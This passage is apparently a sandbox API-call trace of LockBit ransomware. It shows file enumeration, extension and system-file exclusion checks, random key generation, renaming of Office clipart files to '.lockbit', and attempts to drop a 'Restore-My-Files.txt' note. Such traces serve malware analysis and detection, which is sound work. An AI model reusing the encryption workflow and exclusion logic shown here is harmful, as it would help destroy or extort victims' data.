[0103.416] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.416] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.416] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04326_.WMF") returned 1 [0103.417] lstrcmpiW (lpString1="ntldr", lpString2="AN04326_.WMF") returned 1 [0103.417] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04326_.WMF") returned 1 [0103.417] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04326_.WMF") returned 1 [0103.417] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04326_.WMF") returned 1 [0103.417] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04326_.WMF") returned 1 [0103.417] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04326_.WMF") returned 1 [0103.417] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.417] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned=".WMF" [0103.417] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.417] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.417] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.418] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.419] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.419] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.419] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.419] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.419] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.419] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.419] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.lockbit") returned 72 [0103.419] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04326_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f8 [0103.420] CreateIoCompletionPort (FileHandle=0x2f8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.420] malloc (_Size=0x40068) returned 0x3d70048 [0103.420] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3348) returned 1 [0103.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0103.421] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0103.421] ReadFile (in: hFile=0x2f8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0103.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.426] malloc (_Size=0xa6) returned 0x77d800 [0103.426] NtSetInformationFile (FileHandle=0x2f8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.427] free (_Block=0x77d800) [0103.427] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.427] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.427] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.427] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x10c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04332_.WMF", cAlternateFileName="")) returned 1 [0103.427] lstrcmpiW (lpString1=".", lpString2="AN04332_.WMF") returned -1 [0103.427] lstrcmpiW (lpString1="..", lpString2="AN04332_.WMF") returned -1 [0103.427] PathFindExtensionW (pszPath="AN04332_.WMF") returned=".WMF" [0103.427] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.427] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.427] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.427] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.427] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.428] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.429] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.429] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04332_.WMF") returned 1 [0103.430] lstrcmpiW (lpString1="ntldr", lpString2="AN04332_.WMF") returned 1 [0103.430] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04332_.WMF") returned 1 [0103.430] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04332_.WMF") returned 1 [0103.430] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04332_.WMF") returned 1 [0103.430] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04332_.WMF") returned 1 [0103.430] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04332_.WMF") returned 1 [0103.430] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.430] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned=".WMF" [0103.430] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.430] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.430] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.431] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.432] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.432] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.432] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.432] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.lockbit") returned 72 [0103.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x710 [0103.437] CreateIoCompletionPort (FileHandle=0x710, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.437] malloc (_Size=0x40068) returned 0x3e70008 [0103.437] GetFileSizeEx (in: hFile=0x710, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4296) returned 1 [0103.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0103.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0103.438] ReadFile (in: hFile=0x710, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0103.440] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.440] malloc (_Size=0xa6) returned 0x77d800 [0103.440] NtSetInformationFile (FileHandle=0x710, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.441] free (_Block=0x77d800) [0103.441] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.441] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.441] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.441] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04355_.WMF", cAlternateFileName="")) returned 1 [0103.441] lstrcmpiW (lpString1=".", lpString2="AN04355_.WMF") returned -1 [0103.441] lstrcmpiW (lpString1="..", lpString2="AN04355_.WMF") returned -1 [0103.441] PathFindExtensionW (pszPath="AN04355_.WMF") returned=".WMF" [0103.442] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.442] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.443] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.443] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.444] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04355_.WMF") returned 1 [0103.444] lstrcmpiW (lpString1="ntldr", lpString2="AN04355_.WMF") returned 1 [0103.444] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04355_.WMF") returned 1 [0103.444] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04355_.WMF") returned 1 [0103.444] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04355_.WMF") returned 1 [0103.444] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04355_.WMF") returned 1 [0103.444] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04355_.WMF") returned 1 [0103.444] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.444] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF") returned=".WMF" [0103.444] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.445] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.445] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.446] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.446] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.446] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.446] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.446] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.446] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.446] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF.lockbit") returned 72 [0103.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04355_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x304 [0103.446] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.447] malloc (_Size=0x40068) returned 0x3ef0008 [0103.447] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3228) returned 1 [0103.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.447] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.447] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0103.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 